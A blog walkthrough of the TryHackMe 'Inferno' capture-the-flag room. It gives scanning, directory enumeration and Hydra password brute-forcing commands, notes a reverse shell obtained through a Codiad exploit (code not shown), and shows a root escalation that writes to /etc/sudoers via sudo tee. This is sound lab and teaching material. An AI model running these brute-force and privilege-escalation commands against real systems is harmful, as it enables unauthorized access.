TryHackMe | Inferno

TryHackMe | Inferno
Photo by Aziz Acharki / Unsplash

I recently completed the TryHackMe room Inferno.  This was a medium rated room and I think that was a pretty accurate rating.

I started this capture the flag room the same as any other, with a port scan using the nmap tool.

gareth@enso:~/Desktop/Files/Inferno$ nmap -F 10.10.170.49 -oN inferno.nmap
Starting Nmap 7.92 ( https://nmap.org ) at 2021-08-13 21:28 CEST
Nmap scan report for 10.10.170.49
Host is up (0.039s latency).
Not shown: 97 closed tcp ports (conn-refused)
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
106/tcp open  pop3pw

I could see there was a web server running on port 80, so I decided to scan for any directories that may be hidden.  My initial scan using the common.txt wordlist returned nothing of interest, so I tried again with the medium directory list.  This turned up a directory that was protected by basic authentication, called inferno.

gareth@enso:~/Desktop/Files/Inferno$ gobuster dir -u http://10.10.170.49 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster.log
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.170.49
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/08/13 21:31:58 Starting gobuster in directory enumeration mode
===============================================================
/inferno              (Status: 401) [Size: 459]

I then used Hydra to crack the password to this area, assuming the default username of 'admin' was the one used.  Luckily this assumption paid off and I gained access to the area.

gareth@enso:~/Desktop/Files/Inferno$ hydra -l admin -P /usr/share/wordlists/rockyou.txt -f 10.10.170.49 http-get /inferno -t 64
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-13 21:34:33
[DATA] max 64 tasks per 1 server, overall 64 tasks, 14344399 login tries (l:1/p:14344399), ~224132 tries per task
[DATA] attacking http-get://10.10.170.49:80/inferno
[80][http-get] host: 10.10.170.49   login: admin   password: <redacted>
[STATUS] attack finished for 10.10.170.49 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-08-13 21:35:28

Codiad

This looks like a login for something called Codiad?

I was presented with a login form for what looks like a tool called "Codiad".  I searched for an exploit for Codiad using searchsploit and found the following.

Because these exploits required the user to be authenticated, I tried to reuse the credentials from the basic authentication.  This proved successful and I was able to login.

gareth@enso:~/Desktop/Files/Inferno$ searchsploit Codiad
---------------------------------------------------------- ---------------------------------
 Exploit Title                                            |  Path
---------------------------------------------------------- ---------------------------------
Codiad 2.4.3 - Multiple Vulnerabilities                   | php/webapps/35585.txt
Codiad 2.5.3 - Local File Inclusion                       | php/webapps/36371.txt
Codiad 2.8.4 - Remote Code Execution (Authenticated)      | multiple/webapps/49705.py
Codiad 2.8.4 - Remote Code Execution (Authenticated) (2)  | multiple/webapps/49902.py
Codiad 2.8.4 - Remote Code Execution (Authenticated) (3)  | multiple/webapps/49907.py
---------------------------------------------------------- ---------------------------------

After some trial and error with these I could not get any of them to work, so I instead decided to search GitHub and came across a repository that contained an exploit for Codiad which I managed to get working.

I was able to get a reverse-shell on the machine by following the instructions in the exploit file.

Took 3 panes to get a reverse shell

Foothold

Now I had a foothold on the server, it was time to enumerate.  I found an interesting file eventually in the /home/dante/Downloads directory called .download.dat which contained what looked like some hexadecimal.  I used Cyberchef to convert this hexadecimal to ASCII and was presented with the following:

«Or se’ tu quel Virgilio e quella fonte
che spandi di parlar sì largo fiume?»,
rispuos’io lui con vergognosa fronte.

«O de li altri poeti onore e lume,
vagliami ’l lungo studio e ’l grande amore
che m’ha fatto cercar lo tuo volume.

Tu se’ lo mio maestro e ’l mio autore,
tu se’ solo colui da cu’ io tolsi
lo bello stilo che m’ha fatto onore.

Vedi la bestia per cu’ io mi volsi;
aiutami da lei, famoso saggio,
ch’ella mi fa tremar le vene e i polsi».

dante:<redacted>

With the credentials at the bottom I was able to access the server via SSH as the dante user and capture the user flag, which was hidden in the local.txt file in the home directory.

gareth@enso:~/Desktop/Files/Inferno$ ssh dante@10.10.170.49
dante@10.10.170.49's password: 
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-130-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Aug 13 20:11:10 UTC 2021

  System load:  0.0               Processes:           1198
  Usage of /:   42.0% of 8.79GB   Users logged in:     0
  Memory usage: 61%               IP address for eth0: 10.10.170.49
  Swap usage:   0%


39 packages can be updated.
0 updates are security updates.


Last login: Fri Aug 13 20:10:56 2021 from 10.8.145.210
dante@Inferno:~$ cat local.txt

Privilege Escalation

From running the command sudo -l I can see that the dante user has permissions to run the tee command as sudo.  

dante@Inferno:~$ sudo -l
Matching Defaults entries for dante on Inferno:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User dante may run the following commands on Inferno:
    (root) NOPASSWD: /usr/bin/tee

A quick check on GTFOBins showed me how to use this command to gain write-access to any file on the file system.  

LFILE=file_to_write
echo DATA | sudo tee -a "$LFILE"

I used this to add the dante user to the /etc/sudoers file, and to allow him to run any command as sudo without a password.  From there I was able to spawn a root shell and capture the root flag.

dante@Inferno:~$ LFILE=/etc/sudoers
dante@Inferno:~$ echo "dante ALL=(root) NOPASSWD: ALL" | sudo tee -a "$LFILE"
dante ALL=(root) NOPASSWD: ALL
dante@Inferno:~$ sudo -l
Matching Defaults entries for dante on Inferno:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User dante may run the following commands on Inferno:
    (root) NOPASSWD: /usr/bin/tee
    (root) NOPASSWD: ALL
dante@Inferno:~$ sudo su
root@Inferno:/home/dante# cd /root
root@Inferno:~# ls
proof.txt
root@Inferno:~# cat proof.txt
Congrats!

You've rooted Inferno!

<redacted>

mindsflee
root@Inferno:~#

Summary

This room took a bit of time to gain a foothold, due to me not being familiar with Codiad and spending a lot of time trying to find an exploit for it that actually worked.  The reverse-shell gained from the exploit found on GitHub was a bit flaky so I had to enumerate quickly.  I was thankful this room contained a step where I obtained the ssh user password so I could gain a more stable connection.

Thankfully the privilege escalation on this one was quite straight forward due to some poor configuration on the server and the great resource that is GTFOBins.